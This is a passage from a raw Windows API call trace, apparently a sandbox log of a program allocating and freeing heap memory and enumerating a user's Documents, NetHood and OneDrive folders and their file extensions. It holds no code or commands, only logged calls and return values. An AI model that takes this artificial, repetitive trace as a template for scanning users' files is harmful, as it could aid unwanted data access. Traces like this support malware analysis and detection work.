hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.840] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0194.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0194.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.841] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.841] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.842] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.842] PathFindFileNameW (pszPath="") returned="" [0194.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0194.842] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0xffffffff [0194.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0194.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.843] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.844] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.847] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0194.847] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.847] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.847] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.847] PathFindFileNameW (pszPath="") returned="" [0194.848] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698cce90, ftCreationTime.dwHighDateTime=0x1d89fcc, ftLastAccessTime.dwLowDateTime=0x64815980, ftLastAccessTime.dwHighDateTime=0x1d8a27d, ftLastWriteTime.dwLowDateTime=0x64815980, ftLastWriteTime.dwHighDateTime=0x1d8a27d, nFileSizeHigh=0x0, nFileSizeLow=0x8a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXHaYB.mp3", cAlternateFileName="")) returned 0xffffffff [0194.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.848] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.848] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.848] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0194.848] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.848] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.848] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.848] PathFindFileNameW (pszPath="") returned="" [0194.848] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.849] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.849] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.849] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini") returned=".ini" [0194.849] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0194.849] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0194.850] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.850] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.858] HeapFree (in: hHeap=0x620000, 